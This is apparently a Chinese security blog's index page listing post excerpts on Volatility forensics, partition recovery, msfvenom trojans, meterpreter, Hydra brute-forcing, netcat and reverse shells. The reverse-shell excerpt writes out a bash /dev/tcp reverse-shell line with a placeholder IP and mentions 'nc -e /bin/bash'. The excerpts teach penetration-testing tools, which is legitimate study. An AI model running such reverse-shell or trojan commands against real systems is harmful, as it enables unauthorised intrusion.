Junglezt的博客

摘要： volatility 简介: volatility(挖楼推了推) 是一个开源的框架，能够对导出的内存镜像进行分析，能够通过获取内核的数据结构，使用插件获取内存的详细情况和运行状态，同时可以直接dump系统文件，屏幕截图，查看进程。 官网下载地址:https://www.volatilityfound 阅读全文

摘要： 通过之前的博客WinHex恢复分区,我们知道 在MBR中，一共有四行是我们分区的引导，所以，我们手动只能创建三个主分区，通过工具软件，我们最多可以创建四个主分区 那么测试：如何创建四个主分区? 首先，我们创建三个主分区 在创建第四个分区的时候，观察会发现自动变成了一个扩展分区就是绿框框，绿框框里面才 阅读全文

摘要： 情景再现:可能在某一天，打开电脑时发现只剩C盘，剩下的盘找不到了，那么要如何恢复呢？ 创建虚拟硬盘方便我们做实验 右键计算机 → 管理 → 磁盘管理右键 → 创建VHD虚拟硬盘 创建VHD虚拟硬盘会弹出下面的窗口 首先点击预览选择创建虚拟硬盘位置，然后创建虚拟硬盘的大小，这里我是15G，选择虚拟硬盘 阅读全文

摘要： msfvenom也只metasploit中的一个很强的工具，msfvenom生成木马非常的迅速可以各种版本的木马 该工具由msfpaylod和msfencodes的组成 生成木马是需要在本地监听，等待木马上线即可。该步骤在meterpretr的使用有使用到 命令 这里我们主要讲解msfvenom的命 阅读全文

摘要： meterpreter是metasploit中的一个杀手锏，通常在漏洞利用成功后，会返回给攻击者一个攻击通道，其中有很多自动化操作 场景布置 生成木马 首先，我们使用metasploit中的另一个后门工具msfvenom生成一个木马，方便我们测试meterpreter msfvenom -p win 阅读全文

摘要： msfconsole是metasploit中的一个工具； msfconsole集成了很多漏洞的利用的脚本，并且使用起来很简单的网络安全工具 在终端输入msfconsole命令即可进入msf的控制台，msf控制台集成了很多其他程序接口，例如nmap，sqlmap可以在msf控制台中使用 可以看到每个分 阅读全文

摘要： Hydra 在爆破工具中，hydra可是数一数二的存在，是著名黑客组织thc开发的一款开源的暴力密码破解工具，可以在线破解多种密码 Hydra 能够暴力破解以下协议：Asterisk、AFP、Cisco AAA、Cisco auth、Cisco enable、CVS、Firebird、FTP、HTT 阅读全文

摘要： 反弹shell一般利用在命令执行漏洞中 在Netcat的学习中我们学习了如何使用nc -e /bin/bash反弹shell 这里分享一些除了nc以外其他的反弹方式 Bash反弹shell bash -i >& /dev/tcp/IP地址/端口 0>&1 /dev/tcp,udp,host,port 阅读全文

摘要： NetCat瑞士军刀，网络中的瑞士军刀，短小而精悍，功能齐全。简称为nc 端口扫描 参数 作用 -v 扫描端口是否开放 -z 指定端口范围 -w 指定扫描时间 -u 指定udp端口 例如：查看172.16.1.80的21端口是否开启 nc -v 172.16.1.80 21 扫描172.16.1.8 阅读全文

摘要： 主机发现工具 当我们加入一个网段时，不知道该网段主机存活的数量，首先我们要先进行主机存活发现 ping ping命令通常用户查看网络连接状态；得到服务器的IP地址，还有网络连接的延迟，另外可以通过TTL判断出目标的操作系统，在网上的服务器中，一般该值都被修改 在linux中，ping命令会一直进行p 阅读全文